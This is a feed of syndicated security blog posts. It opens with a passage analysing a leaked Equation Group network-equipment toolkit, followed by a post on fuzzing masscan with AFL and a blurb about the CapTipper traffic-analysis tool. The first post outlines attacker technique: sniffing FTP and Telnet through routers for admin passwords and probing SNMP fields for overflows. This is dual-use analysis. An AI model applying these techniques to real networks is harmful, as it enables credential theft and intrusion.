Different pentesters have different ways of doing things once they’ve gotten inside a network, and this is reflected in their toolkits. Some focus on Windows and getting domain admin control, and have tools like mimikatz. Others focus on webapps, and how to install hostile PHP scripts. In this case, these tools reflect a methodology that goes after network equipment.

It’s a good strategy. Finding equipment is easy, and undetectable, just do a traceroute. As long as network equipment isn’t causing problems, sysadmins ignore it, so your implants are unlikely to be detected. Internal network equipment is rarely patched, so old exploits are still likely to work. Some tools appear to target bugs in equipment that are likely older than Equation Group itself.

In particular, because network equipment is at the network center instead of the edges, you can reach out and sniff packets through the equipment. Half the time it’s a feature of the network equipment, so no special implant is needed. Conversely, when on the edge of the network, switches often prevent you from sniffing packets, and even if you exploit the switch (e.g. ARP flood), all you get are nearby machines. Getting critical machines from across the network requires remotely hacking network devices.

So you see a group of pentest-type people (TAO hackers) with a consistent methodology, and toolmakers who develop and refine tools for them. Tool development is a rare thing among pentesters — they use tools, they don’t develop them. Having programmers on staff dramatically changes the nature of pentesting.

Consider the program xml2pcap. I don’t know what it does, but it looks like similar tools I’ve written in my own pentests. Various network devices will allow you to sniff packets, but produce output in custom formats. Therefore, you need to write a quick-and-dirty tool that converts from that weird format back into the standard pcap format for use with tools like Wireshark. More than once I’ve had to convert HTML/XML output to pcap. Setting port filters for ports 21 (FTP) and 23 (Telnet) produces low-bandwidth traffic with high return (admin passwords) within networks — all you need is a script that can convert the packets into a standard format to exploit this.
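Wireshark ships a tool, text2pcap, that does this for plain hex dumps, which gives a feel for the workflow (filenames are placeholders):
text2pcap router-dump.txt router-dump.pcap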

Also consider the tftpd tool in the dump. Many network devices support that protocol for updating firmware and configuration. That’s pretty much all it’s used for. This points to a defensive security strategy for your organization: log all TFTP traffic.
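A minimal sketch of that defensive advice, assuming a tcpdump on a monitoring interface (TFTP runs over UDP port 69):
tcpdump -i eth0 -w tftp.pcap udp port 69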

Same applies to SNMP. By the way, SNMP vulnerabilities in network equipment are still low-hanging fruit. SNMP stores thousands of configuration parameters and statistics in a big tree, meaning that it has an enormous attack surface. Any value that’s settable and variable-length (OCTET STRING, OBJECT IDENTIFIER) is something you can play with for buffer overflows and format-string bugs. The Cisco 0day in the toolkit was one example.

Some have pointed out that the code in the tools is crappy, and they make obvious crypto errors (such as using the same initialization vectors). This is nonsense. It’s largely pentesters, not software developers, creating these tools. And they have limited threat models — encryption is to avoid easy detection that they are exfiltrating data, not to prevent somebody from looking at the data.

From that perspective, then, this is fine code, with some effort spent at quality for tools that don’t particularly need it. I’m a professional coder, and my little scripts often suck worse than the code I see here.

Lastly, I don’t think it’s a hack of the NSA themselves. Those people are over-the-top paranoid about opsec. But 95% of the US cyber-industrial-complex is made of up companies, who are much more lax about security than the NSA itself. It’s probably one of those companies that got popped — such as an employee who went to DEFCON and accidentally left his notebook computer open on the hotel WiFi.

Conclusion

Despite the 0days, these appear to be post-exploitation tools. They look like the sort of tools pentesters might develop over years, where each time they pop a target, they do a little development based on the devices they find inside that new network in order to compromise more machines/data.

Instrumenting masscan for AFL network fuzzing

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/06/instrumenting-masscan-for-afl-fuzzing.html

This blog post is about work in progress. You probably don’t want to read it.


So I saw this tweet today:

As it turns out, he’s just fuzzing input files. This is good, and he’s apparently already found some bugs, but it’s not a huge threat.

Instead, what really needs to be fuzzed is network input. This is a chronic problem with AFL, which is designed for inserting files, not network traffic, into programs.

But making this work is actually pretty trivial. I just need to make a tiny change to masscan so that instead of opening a libpcap adapter, it instead opens a libpcap formatted file.

This change was trivial; successfully running it is tough. You have to configure the command line so all IP addresses match up with the libpcap file content, which is a pain. I created a sample libpcap file and checked it into the project, along with a help document explaining it. Just git clone the project, run make, then run this command line to see it run for yourself:

bin/masscan --nobacktrace --adapter file:data/afl-http.pcap --source-ip 10.20.30.200 --source-port 6000 --source-mac 00-11-22-33-44-55 --router-mac c0-c1-c0-a0-9b-9d --seed 0 --banners -p80 74.125.196.147 --nostatus

If you run it on the command line, it appears to return immediately. I say “appears” because there’s actually a 10-millisecond wait. That limits fuzzing speed to 100 attempts per second, rather than thousands per second. That’s a tougher change, so I’ll have to get around to fixing that, but in the meanwhile, you can just run a bunch of AFLs in parallel to get around this.
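A sketch of that, using AFL’s built-in master/secondary parallel mode (directory and fuzzer names are placeholders; the masscan arguments are the same as above, with @@ standing in for the input pcap file):
afl-fuzz -i testcases -o findings -M fuzz01 -- bin/masscan --nobacktrace --adapter file:@@ --source-ip 10.20.30.200 --source-port 6000 --source-mac 00-11-22-33-44-55 --router-mac c0-c1-c0-a0-9b-9d --seed 0 --banners -p80 74.125.196.147 --nostatus
afl-fuzz -i testcases -o findings -S fuzz02 -- bin/masscan --nobacktrace --adapter file:@@ --source-ip 10.20.30.200 --source-port 6000 --source-mac 00-11-22-33-44-55 --router-mac c0-c1-c0-a0-9b-9d --seed 0 --banners -p80 74.125.196.147 --nostatus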

But when I try to run AFL, it’s not working at the moment. I instead get this error:

As you can see, the command that returns in 10ms is now hanging when run under AFL, which says that it doesn’t return in 1000ms. Using the ‘-t’ option to increase the timeout doesn’t help. Running masscan in some other way, such as parsing configuration files, works just fine.


Update

So I changed it to “join” threads cleanly, so that the entire thing can run without ever having to stop and wait. However, this created a second problem: now AFL refused to run, because the target was crashing instead of hanging. AFL suggested that it might be an out-of-memory issue, and that I should increase memory. So I bumped up memory and now it’s running.
This memory issue might be what the problem was all along. Masscan assumes big scanning and sets up some large data structures at the start, so it may exceed the 50 megabytes assumed by AFL.
So now I have it running, fuzzing HTTP server response input:

But this isn’t really success. The pcap file is 1986 bytes long. However, AFL has “trimmed” the input file down to 0.20%, which is the first 4 bytes of the file. This is just testing the libpcap library at this moment, and the fact that it supports multiple file types determined by the “magic” string in that first 4 bytes. I need to figure out how to make it fuzz starting deeper in the file, not at byte 0.


Update

I got the LLVM version working on the Odroid C2 (ARM64), so naturally I need to spread the work across its 4 cores.

The Odroid has slightly faster CPUs than the Raspberry Pi 3, but most importantly, it’s got 64-bit Linux available to it, which the Raspberry Pi 3 apparently still doesn’t.

CapTipper – Explore Malicious HTTP Traffic

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/Y8HVB-RsGlQ/

CapTipper is a Python tool to explore malicious HTTP traffic, it can also help analyse and revive captured sessions from PCAP files. It sets up a web server that acts exactly as the server in the PCAP file and contains internal tools with a powerful interactive console for analysis and inspection of the hosts, objects […]

The post CapTipper…

Read the full post at darknet.org.uk